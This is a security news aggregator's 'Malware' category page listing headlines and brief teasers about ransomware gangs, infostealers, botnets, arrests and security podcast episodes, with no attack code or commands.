serisec

Category: Malware

  • Ransomware gang busted in Thailand hotel raid

    Ransomware gang busted in Thailand hotel raid In a dramatic raid at a hotel in central Pattaya this week, Thai police have unearthed a criminal gang that was operating a ransomware and illicit gambling operation. Read more in my article on the Hot for Security blog. Graham Cluley Go to grahamcluley

  • Bert ransomware: what you need to know

    Bert ransomware: what you need to know Bert is a recently-discovered strain of ransomware that encrypts victims’ files and demands a payment for the decryption key. Read more in my article on the Fortra blog. Graham Cluley Go to grahamcluley

  • Dutch police identify users as young as 11-year-old on Cracked.io hacking forum

    Dutch police identify users as young as 11-year-old on Cracked.io hacking forum Dutch police have announced that they have identified 126 individuals linked to the now dismantled Cracked.io cybercrime forum. Read more in my article on the Hot for Security blog. Graham Cluley Go to grahamcluley

  • Empty shelves after US’s largest natural and organic food distributor suffers cyber attack

    Empty shelves after US’s largest natural and organic food distributor suffers cyber attack The spate of cyber attacks impacting the retail industry continues, with the latest victim being United Natural Foods (UNFI), which supplies organic produce to Whole Foods, Amazon, Target, and Walmart, amongst many others. Read more in my article on the Hot for…

  • Hackers Advertising New Blackhat Tool Nytheon AI on Popular Hacking Forums

    Hackers Advertising New Blackhat Tool Nytheon AI on Popular Hacking Forums A sophisticated new threat platform, Nytheon AI, has emerged, which combines multiple uncensored large language models (LLMs) built specifically for malicious activities. The platform, discovered by Cato CTRL, is being actively promoted on popular hacking forums, including XSS and various Telegram channels, representing a…

  • New Malware Attack Via “I’m not a Robot Check” to Trick Users into Running Malware

    New Malware Attack Via “I’m not a Robot Check” to Trick Users into Running Malware A sophisticated new malware attack vector that manipulates users through fake browser verification prompts designed to mimic legitimate CAPTCHA systems.  This attack leverages social engineering techniques combined with clipboard manipulation and obfuscated PowerShell commands to trick victims into voluntarily executing…

  • US offers $10 million reward for tips about state-linked RedLine hackers

    US offers $10 million reward for tips about state-linked RedLine hackers How would you like to earn yourself millions of dollars? Well, it may just be possible – if you have information which could help expose the identities of cybercriminals involved with the notorious RedLine information-stealing malware. Read more in my article on the Tripwire…

  • Marks & Spencer’s ransomware nightmare – more details emerge

    Marks & Spencer’s ransomware nightmare – more details emerge Over Easter, retail giant Marks & Spencer (M&S) discovered that it had suffered a highly damaging ransomware attack that left some shop shelves empty, shut down online ordering, some staff unable to clock in and out, and caused some of its major suppliers to resort to…

  • Denodo Scheduler Vulnerability Let Attackers Execute Remote Code

    Denodo Scheduler Vulnerability Let Attackers Execute Remote Code A significant security vulnerability has been discovered in Denodo Scheduler, a data management software component, that allows attackers to execute remote code on affected systems.  The flaw, identified as CVE-2025-26147, exploits a path traversal vulnerability in the Kerberos authentication configuration feature, potentially compromising the security of enterprise…

  • Interlock ransomware: what you need to know

    Interlock ransomware: what you need to know “We don’t just want payment; we want accountability.” The malicious hackers behind the Interlock ransomware try to justify their attacks. Learn more about what you need to know about Interlock in my article on the Tripwire State of Security blog. Graham Cluley Go to grahamcluley

  • Damascened Peacock: Russian hackers targeted UK Ministry of Defence

    Damascened Peacock: Russian hackers targeted UK Ministry of Defence The UK’s Ministry of Defence has revealed that it was the target of a sophisticated cyber attack that saw Russia-linked hackers pose as journalists. Read more in my article on the Hot for Security blog. Graham Cluley Go to grahamcluley

  • New Botnet Hijacks 9,000 ASUS Routers & Enables SSH Access by Injecting Public Key

    New Botnet Hijacks 9,000 ASUS Routers & Enables SSH Access by Injecting Public Key A sophisticated botnet campaign dubbed “AyySSHush” has compromised over 9,000 ASUS routers worldwide, establishing persistent backdoor access that survives firmware updates and reboots.  The stealthy operation, first detected in March 2025, demonstrates advanced nation-state-level tradecraft by exploiting authentication vulnerabilities and legitimate…

  • Smashing Security podcast #419: Star Wars, the CIA, and a WhatsApp malware mirage

    Smashing Security podcast #419: Star Wars, the CIA, and a WhatsApp malware mirage Why is a cute Star Wars fan website now redirecting to the CIA? How come Cambodia has become the world’s hotspot for scam call centres? And can a WhatsApp image really drain your bank account with a single download, or is it…

  • 3AM ransomware attack poses as a call from IT support to compromise networks

    3AM ransomware attack poses as a call from IT support to compromise networks Cybercriminals are getting smarter. Not by developing new types of malware or exploiting zero-day vulnerabilities, but by simply pretending to be helpful IT support desk workers. Find out how they do it in my article on the Tripwire State of Security blog.…

  • PupkinStealer Attacks Windows System to Steal Login Credentials & Desktop Files

    PupkinStealer Attacks Windows System to Steal Login Credentials & Desktop Files A new information-stealing malware dubbed “PupkinStealer” has been identified by cybersecurity researchers, targeting sensitive user data through a straightforward yet effective approach. First observed in April 2025, this .NET-based malware written in C# focuses on stealing browser credentials, messaging app sessions, and desktop files,…

  • New FrigidStealer Malware Attacking macOS Users to Steal Login Credentials

    New FrigidStealer Malware Attacking macOS Users to Steal Login Credentials FrigidStealer, a sophisticated information-stealing malware that emerged in January 2025, is actively targeting macOS endpoints to steal sensitive user data through deceptive tactics. Unlike traditional malware, FrigidStealer exploits user trust in routine software updates, making it particularly insidious. The malware has raised significant concerns among…

  • Google Threat Intelligence Launches Actionable Technique To Hunt for Malicious .Desktop Files

    Google Threat Intelligence Launches Actionable Technique To Hunt for Malicious .Desktop Files Google Threat Intelligence has launched a new blog series aimed at empowering security professionals with advanced threat hunting techniques, kicking off with a deep dive into detecting malicious .desktop files on Linux systems. .desktop files, standard configuration files in Linux desktop environments, define…

  • Two years’ jail for down-on-his-luck man who sold ransomware online

    Two years’ jail for down-on-his-luck man who sold ransomware online A man has been jailed in Ireland for two years after pleading guilty to offences related to his illegal online business that sold ransomware and other malware, as well as stolen credit card details, and false bank accounts. Read more in my article on the…

  • “PupkinStealer” A New .NET-Based Malware Steals Browser Credentials & Exfiltrate via Telegram

    “PupkinStealer” A New .NET-Based Malware Steals Browser Credentials & Exfiltrate via Telegram A newly identified information-stealing malware, dubbed PupkinStealer, Developed in C# using the .NET framework, this lightweight yet effective malware targets sensitive user data, including browser credentials, desktop files, messaging app sessions, and screenshots. According to a CYFIRMA detailed analysis shared with Cyber Security…

  • Beware! Fake AI Video Generation Platforms Drop Stealer Malware on Your Computers

    Beware! Fake AI Video Generation Platforms Drop Stealer Malware on Your Computers As artificial intelligence (AI) tools gain mainstream traction for content creation, cybercriminals are capitalizing on the hype with a sophisticated new attack vector, fake AI platforms promising advanced video and image editing capabilities. These fraudulent sites, amplified through viral social media campaigns and…

  • Smashing Security podcast #416: High street hacks, and Disney’s Wingdings woe

    Smashing Security podcast #416: High street hacks, and Disney’s Wingdings woe Brits face empty shelves and suspended meal deals as cybercriminals hit major high street retailers, and a terminated Disney employee gets revenge with a little help with Wingdings. Plus Graham challenges Carole to a game of “Malware or metal?”, and we wonder just happens…

  • NCSC warns of IT helpdesk impersonation trick being used by ransomware gangs after UK retailers attacked

    NCSC warns of IT helpdesk impersonation trick being used by ransomware gangs after UK retailers attacked The UK’s National Cyber Security Centre (NCSC) has warned the IT helpdesks of retailers to be on their guard against bogus support calls they might receive from hackers pretending to be staff locked out of their accounts. Read more…

  • Smashing Security podcast #415: Hacking hijinks at the hospital, and WASPI scams

    Smashing Security podcast #415: Hacking hijinks at the hospital, and WASPI scams He’s not a pop star, but Jeffrey Bowie is alleged to have toured staff areas of a hospital in Oklahoma, hunting for computers he could install spyware on. We dive into the bizarre case of the man accused of hacking medical networks and…

  • Ransomware attacks on critical infrastructure surge, reports FBI

    Ransomware attacks on critical infrastructure surge, reports FBI The FBI is set to report that ransomware was the most pervasive cybersecurity threat to US critical infrastructure during the year of 2024, with complaints of ransomware attacks against critical sectors jumping 9% over the previous year. Read more in my article on the Tripwire State of…

  • Hackers access sensitive SIM card data at South Korea’s largest telecoms company

    Hackers access sensitive SIM card data at South Korea’s largest telecoms company Mobile network operator SK Telecom, which serves approximately 34 million subscribers in South Korea, has confirmed that it suffered a cyber attack earlier this month that saw malware infiltrate its internal systems, and access data related to customers’ SIM cards. Read more in…

  • North Korean APT Hackers Create Companies to Deliver Malware Strains Targeting Job Seekers

    North Korean APT Hackers Create Companies to Deliver Malware Strains Targeting Job Seekers A sophisticated North Korean advanced persistent threat (APT) group known as “Contagious Interview” has established elaborate fake cryptocurrency consulting companies to target job seekers with specialized malware. The group, a subunit of the infamous North Korean state-sponsored Lazarus Group, has created three…

  • Smashing Security podcast #414: Zoom.. just one click and your data goes boom!

    Smashing Security podcast #414: Zoom.. just one click and your data goes boom! Graham explores how the Elusive Comet cybercrime gang are using a sneaky trick of stealing your cryptocurrency via an innocent-appearing Zoom call, and Carole goes under the covers to explore the extraordinary lengths bio-hacking millionaire Bryan Johnson is attempting to extend his…

  • Hackers Attacking Organization With New Malware Mimic as Networking Software Updates

    Hackers Attacking Organization With New Malware Mimic as Networking Software Updates A sophisticated backdoor targeting various large Russian organizations across government, finance, and industrial sectors has been uncovered during a cybersecurity investigation in April 2025. The malware, which masquerades as legitimate updates for ViPNet secure networking software, enables attackers to steal sensitive data and deploy…

  • Slopsquatting

    Slopsquatting As AI coding assistants invent nonexistent software libraries to download and use, enterprising attackers create and upload libraries with those names—laced with malware, of course. Bruce Schneier Go to bruce schneier

  • Medusa ransomware gang claims to have hacked NASCAR

    Medusa ransomware gang claims to have hacked NASCAR The Medusa ransomware-as-a-service (RaaS) claims to have compromised the computer systems of NASCAR, the United States’ National Association for Stock Car Auto Racing, and made off with more than 1TB of data. Read more in my article on the Hot for Security blog. Graham Cluley Go to…

  • Beware Developers! Malicious NPM Packages Targeting PayPal Users to Steal Sensitive Data

    Beware Developers! Malicious NPM Packages Targeting PayPal Users to Steal Sensitive Data FortiGuard Labs, Fortinet’s AI-driven threat intelligence arm, has uncovered a series of malicious NPM packages designed to steal sensitive information from developers and target PayPal users. Detected between March 5 and March 14, 2025, these packages were published by a threat actor using…

  • Ransomware reaches a record high, but payouts are dwindling

    Ransomware reaches a record high, but payouts are dwindling Will you be shedding a tear for the cybercriminals? Read more in my article on the Tripwire blog. Graham Cluley Go to grahamcluley

  • Hackers Leveraging Fast Flux Technique to Evade Detection & Hide Malicious Servers

    Hackers Leveraging Fast Flux Technique to Evade Detection & Hide Malicious Servers CISA warns of threat actors’ increasing adoption of the fast flux technique to evade detection and conceal malicious server infrastructures. As cybercriminal operations grow increasingly sophisticated, threat actors adopt advanced techniques like fast flux to mask malicious infrastructure, evade defensive measures, and maintain persistent access…

  • HellCat ransomware: what you need to know

    HellCat ransomware: what you need to know HellCat – the ransomware gang that has been known to demand payment… in baguettes! Are they rolling in the dough? Bread it and weep in my article on the Tripwire State of Security blog. Graham Cluley Go to grahamcluley

  • The AI Fix #44: AI-generated malware, and a stunning AI breakthrough

    The AI Fix #44: AI-generated malware, and a stunning AI breakthrough In episode 44 of The AI Fix, ChatGPT won’t build a crystal meth lab, GPT-4o improves the show’s podcast art, some students manage to screw in a lightbulb, Google releases Gemini 2.5 Pro Experimental and nobody notices, and Mark invents a clock for measuring…

  • Hackers exploit little-known WordPress MU-plugins feature to hide malware

    Hackers exploit little-known WordPress MU-plugins feature to hide malware A new security issue is putting WordPress-powered websites at risk. Hackers are abusing the “Must-Use” plugins (MU-plugins) feature to hide malicious code and maintain long-term access on hacked websites. Read more in my article on the Hot for Security blog. Graham Cluley Go to grahamcluley

  • VanHelsing ransomware: what you need to know

    VanHelsing ransomware: what you need to know First reported earlier in March 2025, VanHelsing is a new ransomware-as-a-service operation. Read more in my article on the Tripwire State of Security blog. Graham Cluley Go to grahamcluley

  • New IOCONTROL Malware Attacking Critical Infrastructure to Gain Remote Access and Control

    New IOCONTROL Malware Attacking Critical Infrastructure to Gain Remote Access and Control A newly identified malware strain dubbed “IOCONTROL” has emerged as a critical threat to operational technology (OT) and Internet of Things (IoT) systems, particularly targeting fuel-management infrastructure in the United States and Israel. First observed in December 2024, this Linux-based malware has been…

  • Smashing Security podcast #409: Peeping perverts and FBI phone calls

    Smashing Security podcast #409: Peeping perverts and FBI phone calls In episode 409 of the “Smashing Security” podcast, we uncover the curious case of the Chinese cyber-attack on Littleton’s Electric Light Company, and a California landlord’s hidden camera scandal. Find out about this, and more, in the latest edition of the “Smashing Security” podcast by…

  • BlackLock ransomware: What you need to know

    BlackLock ransomware: What you need to know BlackLock has become a big deal, very quickly. It has been predicted to be one of the biggest ransomware-as-a-service operations of 2025. Read more in my article on the Tripwire State of Security blog. Graham Cluley Go to grahamcluley

  • Supply-chain CAPTCHA attack hits over 100 car dealerships

    Supply-chain CAPTCHA attack hits over 100 car dealerships A security researcher has discovered that the websites of over 100 car dealerships have been compromised in a supply-chain attack that attempted to infect the PCs of internet visitors. Read more in my article on the Hot for Security blog. Graham Cluley Go to grahamcluley

  • Free file converter malware scam “rampant” claims FBI

    Free file converter malware scam “rampant” claims FBI Whether you’re downloading a video from YouTube or converting a Word document into a PDF file, there’s a chance that you might be unwittingly handing control of your PC straight into the hands of cybercriminals. Read more in my article on the Hot for Security blog. Graham…

  • TP-Link Router Botnet

    TP-Link Router Botnet There is a new botnet that is infecting TP-Link routers: The botnet can lead to command injection which then makes remote code execution (RCE) possible so that the malware can spread itself across the internet automatically. This high severity security flaw (tracked as CVE-2023-1389) has also been used to spread other malware…

  • New Campaign Attacking PyPI Users to Steal Sensitive Data Including Cloud Tokens

    New Campaign Attacking PyPI Users to Steal Sensitive Data Including Cloud Tokens Security researchers have uncovered a sophisticated malware campaign targeting users of the Python Package Index (PyPI), Python’s official third-party software repository.  This latest attack vector involves several malicious packages disguised as time-related utilities, which are actually designed to steal sensitive information including cloud…

  • Decrypting Linux/ESXi Akira Ransomware Files Without Paying Ransomware

    Decrypting Linux/ESXi Akira Ransomware Files Without Paying Ransomware A cybersecurity researcher has successfully broken the encryption used by the Linux/ESXI variant of the Akira ransomware, enabling data recovery without paying the ransom demand.  The breakthrough exploits a critical weakness in the ransomware’s encryption methodology. According to the researcher, the malware uses the current time in…

  • Medusa ransomware: FBI and CISA urge organisations to act now to mitigate threat

    Medusa ransomware: FBI and CISA urge organisations to act now to mitigate threat The Medusa ransomware gang continues to present a major threat to the critical infrastructure sector, according to a newly-released – with at least one organisation hit with a “triple-extortion” threat. Read more in my article on the Tripwire State of Security blog.…

  • Smashing Security podcast #408: A gag order backfires, and a snail mail ransom demand

    Smashing Security podcast #408: A gag order backfires, and a snail mail ransom demand What happens when a healthcare giant’s legal threats ignite a Streisand Effect wildfire… while a ransomware gang appears to ditch the dark web for postage stamps? Find out about this, and more, in the latest edition of the “Smashing Security” podcast…

  • Man found guilty of planting infinite loop logic bomb on ex-employer’s system

    Man found guilty of planting infinite loop logic bomb on ex-employer’s system Davis Lu had planted malicious Java code onto his employer’s network that would cause “infinite loops” that would ultimate result in the server crashing or hanging. Read more in my article on the Hot for Security blog. Graham Cluley Go to grahamcluley

  • Chinese Hackers New Malware Dubbed ‘Squidoor’ Attacking Global Organizations

    Chinese Hackers New Malware Dubbed ‘Squidoor’ Attacking Global Organizations A sophisticated backdoor malware called “Squidoor” being deployed by suspected Chinese threat actors against organizations across South America and Southeast Asia. The malware, designed for exceptional stealth, offers attackers multiple methods to maintain persistent access to compromised networks while evading detection from advanced security systems. Initial…

  • Thousands of WordPress Websites Infected with Malware

    Thousands of WordPress Websites Infected with Malware The malware includes four separate backdoors: Creating four backdoors facilitates the attackers having multiple points of re-entry should one be detected and removed. A unique case we haven’t seen before. Which introduces another type of attack made possibly by abusing websites that don’t monitor 3rd party dependencies in…

  • Smashing Security podcast #407: HP’s hold music, and human trafficking

    Smashing Security podcast #407: HP’s hold music, and human trafficking Journey with us to Myanmar’s shadowy scam factories, where trafficked workers are forced to run romance-baiting and fake tech support scams, and find out why a company’s mandatory hold time for tech support could lead to innocent users having their computers compromised. All this and…

  • Android App With 220,000+ Downloads From Google Play Installs Banking Trojan

    Android App With 220,000+ Downloads From Google Play Installs Banking Trojan A sophisticated Android banking trojan campaign leveraging a malicious file manager application accumulated over 220,000 downloads on the Google Play Store before its removal.  Dubbed Anatsa (also known as TeaBot), the malware targets global financial institutions through a multi-stage infection process. It deploys fake…

  • Cactus ransomware: what you need to know

    Cactus ransomware: what you need to know Cactus is a ransomware-as-a-service (RaaS) group that encrypts victim’s data and demands a ransom for a decryption key. Read more about it in my article on the Tripwire State of Security blog. Graham Cluley Go to grahamcluley

  • CISA refutes claims it has been ordered to stop monitoring Russian cyber threats

    CISA refutes claims it has been ordered to stop monitoring Russian cyber threats It’s been a confusing few days in the world of American cybersecurity… Read more in my article on the Hot for Security blog. Graham Cluley Go to grahamcluley

  • Stop targeting Russian hackers, Trump administration orders US Cyber Command

    Stop targeting Russian hackers, Trump administration orders US Cyber Command The Trump administration has told US cyber command and CISA to stop following or reporting on Russian cyber threats. Yes, Russia! That country everyone used to agree was home to lots of ransomware gangs and hackers. Hmmm… Read more in my article on the Hot…

  • Warning issued as hackers offer firms fake cybersecurity audits to break into their systems

    Warning issued as hackers offer firms fake cybersecurity audits to break into their systems Companies are being warned that malicious hackers are using a novel technique to break into businesses – by pretending to offer audits of the company’s cybersecurity. Read more in my article on the Tripwire State of Security blog. Graham Cluley Go…

  • Smashing Security podcast #406: History’s biggest heist just happened, and online abuse

    Smashing Security podcast #406: History’s biggest heist just happened, and online abuse In episode 406 of the “Smashing Security” podcast, we explore how the cryptocurrency exchange Bybit has been hacked to the jaw-dropping tune of $1.5 billion, and we look at what is being done to better defend women and girls’ safety online. All this…

  • Flaw found in stalkerware apps, exposing millions of people. Here’s how to find out if your phone is being spied upon

    Flaw found in stalkerware apps, exposing millions of people. Here’s how to find out if your phone is being spied upon A serious security vulnerability has been found in popular stalkerware apps, exposing the sensitive personal information and communications of millions of people. Read more in my article on the Hot for Security blog. Graham…

  • Smashing Security podcast #405: A crypto con exchange, and soaring ticket scams

    Smashing Security podcast #405: A crypto con exchange, and soaring ticket scams From shadowy Bitcoin exchanges to Interpol’s most wanted, Alexander Vinnik was the alleged kingpin behind BTC-e, a $4bn crypto laundering empire. Learn more about him, and how he became a geopolitical pawn between the US, France, and Russia. Plus! Hear how concert-goers are…

  • Weaponized Signal, Line, and Gmail Apps Delivers Malware That Changes System Defenses

    Weaponized Signal, Line, and Gmail Apps Delivers Malware That Changes System Defenses A sophisticated cyberattack campaign targeting Chinese-speaking users, malicious actors have weaponized fake versions of popular applications such as Signal, Line, and Gmail. These fake and weaponized apps are distributed via deceptive download pages that deliver malware capable of altering system defenses, evading detection,…

  • US charges two Russian men in connection with Phobos ransomware operation

    US charges two Russian men in connection with Phobos ransomware operation Roman Berezhnoy and Egor Nikolaevich Glebov are alleged to have extorted over US $16 million in ransom payments using the Phobos ransomware, impacting over 1000 organisations in the United States. Read more in my article on the Hot for Security blog. Graham Cluley Go…

  • Delivering Malware Through Abandoned Amazon S3 Buckets

    Delivering Malware Through Abandoned Amazon S3 Buckets Here’s a supply-chain attack just waiting to happen. A group of researchers searched for, and then registered, abandoned Amazon S3 buckets for about $400. These buckets contained software libraries that are still used. Presumably the projects don’t realize that they have been abandoned, and still ping them for…

  • Smashing Security podcast #404: Podcast not found

    Smashing Security podcast #404: Podcast not found The story of how hackers managed to compromise the US Government’s official SEC Twitter account to boost the price of Bitcoins, AI isn’t helping reduce the rife conspiracy theories inside classrooms, and is the funeral bell tolling for ransomware? All this and more is discussed in the latest…

  • FinStealer Malware Attacking Leading Indian Bank’s Mobile Users To Steal Login Credentials

    FinStealer Malware Attacking Leading Indian Bank’s Mobile Users To Steal Login Credentials A sophisticated malware campaign dubbed “FinStealer” is actively targeting customers of a leading Indian bank through fraudulent mobile applications. The malware, identified as Trojan.rewardsteal/joxpk, employs advanced tactics to steal banking credentials and personal information from unsuspecting users. The malicious campaign operates through a…

  • Screenshot-Reading Malware

    Screenshot-Reading Malware Kaspersky is reporting on a new type of smartphone malware. The malware in question uses optical character recognition (OCR) to review a device’s photo library, seeking screenshots of recovery phrases for crypto wallets. Based on their assessment, infected Google Play apps have been downloaded more than 242,000 times. Kaspersky says: “This is the…

  • Smashing Security podcast #403: Coinbase crypto heists, QR codes, and ransomware in the classroom

    Smashing Security podcast #403: Coinbase crypto heists, QR codes, and ransomware in the classroom In episode 403 of “Smashing Security” we dive into the mystery of $65 million vanishing from Coinbase users faster than J-Lo slipped into Graham’s DMs, Geoff gives a poor grade for PowerSchool’s security, and Carole takes a curious look at QR…

  • Fake Reddit and WeTransfer Sites are Pushing Malware

    Fake Reddit and WeTransfer Sites are Pushing Malware There are thousands of fake Reddit and WeTransfer webpages that are pushing malware. They exploit people who are using search engines to search sites like Reddit. Unsuspecting victims clicking on the link are taken to a fake WeTransfer site that mimicks the interface of the popular file-sharing…

  • Smashing Security podcast #402: Hackers get hacked, the British Museum IT shutdown, and social media kidnaps

    Smashing Security podcast #402: Hackers get hacked, the British Museum IT shutdown, and social media kidnaps What happens when eager computer enthusiasts unknowingly download a trojanized hacking tool and find themselves on the wrong side of cybersecurity? A former employee’s actions led to chaos and raise urgent questions about the security of cultural treasures. And…

  • DeepSeek R1 Jailbroken to Generate Ransomware Development Scripts

    DeepSeek R1 Jailbroken to Generate Ransomware Development Scripts DeepSeek R1, the latest AI model from China, is making waves in the tech world for its reasoning capabilities. Positioned as a challenger to AI giants like OpenAI, it has already climbed to 6th place on the Chatbot Arena benchmarking list, surpassing notable models such as Meta’s…

  • Akira’s New Linux Ransomware Attacking VMware ESXi Servers

    Akira’s New Linux Ransomware Attacking VMware ESXi Servers The Akira ransomware group, a prominent player in the Ransomware-as-a-Service (RaaS) domain since March 2023, has intensified its operations with a new Linux variant targeting VMware ESXi servers. Initially focused on Windows systems, Akira expanded its scope in April 2023 by deploying a Linux-based encryptor specifically designed…

  • New VPN Backdoor

    New VPN Backdoor A newly discovered VPN backdoor uses some interesting tactics to avoid detection: When threat actors use backdoor malware to gain access to a network, they want to make sure all their hard work can’t be leveraged by competing groups or detected by defenders. One countermeasure is to equip the backdoor with a…

  • Medusa ransomware: what you need to know

    Medusa ransomware: what you need to know Medusa is a ransomware-as-a-service (RaaS) platform that has targeted organisations around the world. Read more about it in my article on the Tripwire State of Security blog. Graham Cluley Go to grahamcluley

  • Gootloader inside out

    Gootloader inside out Open-source intelligence reveals the server-side code of this pernicious SEO-driven malware – without needing a lawyer afterward Gabor Szappanos Go to sophos

  • FBI Deletes PlugX Malware from Thousands of Computers

    FBI Deletes PlugX Malware from Thousands of Computers According to a DOJ press release, the FBI was able to delete the Chinese-used PlugX malware from “approximately 4,258 U.S.-based computers and networks.” Details: To retrieve information from and send commands to the hacked machines, the malware connects to a command-and-control server that is operated by the…

  • Space Bears ransomware: what you need to know

    Space Bears ransomware: what you need to know The Space Bears ransomware gang stands out from the crowd by presenting itself better than many legitimate companies, with corporate stock images and a professional-looking leak site. Read more in my article on the Tripwire State of Security blog. Graham Cluley Go to grahamcluley

  • Smashing Security podcast #398: Fake CAPTCHAs, Harmageddon, and Krispy Kreme

    Smashing Security podcast #398: Fake CAPTCHAs, Harmageddon, and Krispy Kreme This week, we delve into the dark world of fake CAPTCHAs designed to hijack your computer. Plus, the AI safety clock is ticking down – is doomsday closer than we think? And to top it off, we uncover the sticky situation of Krispy Kreme facing…

  • Doughnut orders disrupted! Krispy Kreme suffers hack attack

    Doughnut orders disrupted! Krispy Kreme suffers hack attack Krispy Kreme, the dispenser of delectable doughnuts, says that it suffered a cyber attack at the end of last month which saw its IT systems compromised and has disrupted online orders in parts of the United States. Read more in my article on the Hot for Security…

  • 3AM ransomware: what you need to know

    3AM ransomware: what you need to know The 3AM ransomware first emerged in late 2023. Like other ransomware, 3AM exfiltrates victims’ data (demanding a ransom is paid) and encrypts the copies left behind. Here’s what you need to know. Read more in my article on the Tripwire State of Security blog. Graham Cluley Go to…

  • Detecting Pegasus Infections

    Detecting Pegasus Infections This tool seems to do a pretty good job. The company’s Mobile Threat Hunting feature uses a combination of malware signature-based detection, heuristics, and machine learning to look for anomalies in iOS and Android device activity or telltale signs of spyware infection. For paying iVerify customers, the tool regularly checks devices for…

  • Ransomware-hit vodka maker Stoli files for bankruptcy in the United States

    Ransomware-hit vodka maker Stoli files for bankruptcy in the United States Stoli Group USA, the US subsidiary of vodka maker Stoli, has filed for bankruptcy – and a ransomware attack is at least partly to blame. The American branch of Stoli, which imports and distributes Stoli brands in the United States, as well as the…

  • Tech support scams leverage Google ads again and again, fleecing unsuspecting internet users

    Tech support scams leverage Google ads again and again, fleecing unsuspecting internet users It’s not a new technique, but that doesn’t mean that cybercriminals cannot make rich rewards from SEO poisoning. Read more in my article on the Tripwire State of Security blog. Graham Cluley Go to grahamcluley

  • No guarantees of payday for ransomware gang that claims to have hacked children’s hospital

    No guarantees of payday for ransomware gang that claims to have hacked children’s hospital What is the point of INC Ransom’s attack on Alder Hey? They are not likely to be paid, and the attack on a children’s hospital only increases the chances that they will one day find their collars felt by law enforcement.…

  • UK hospital, hit by cyberattack, resorts to paper and postpones procedures

    UK hospital, hit by cyberattack, resorts to paper and postpones procedures A British hospital is grappling with a major cyberattack that has crippled its IT systems and disrupted patient care. Read more in my article on the Hot for Security blog. Graham Cluley Go to grahamcluley

  • Mimic ransomware: what you need to know

    Mimic ransomware: what you need to know What makes Mimic particularly unusual is that it exploits the API of a legitimate Windows file search tool (“Everything” by Voidtools) to quickly locate files for encryption. Find out more about the threat in my article on the Tripwire State of Security blog. Graham Cluley Go to grahamcluley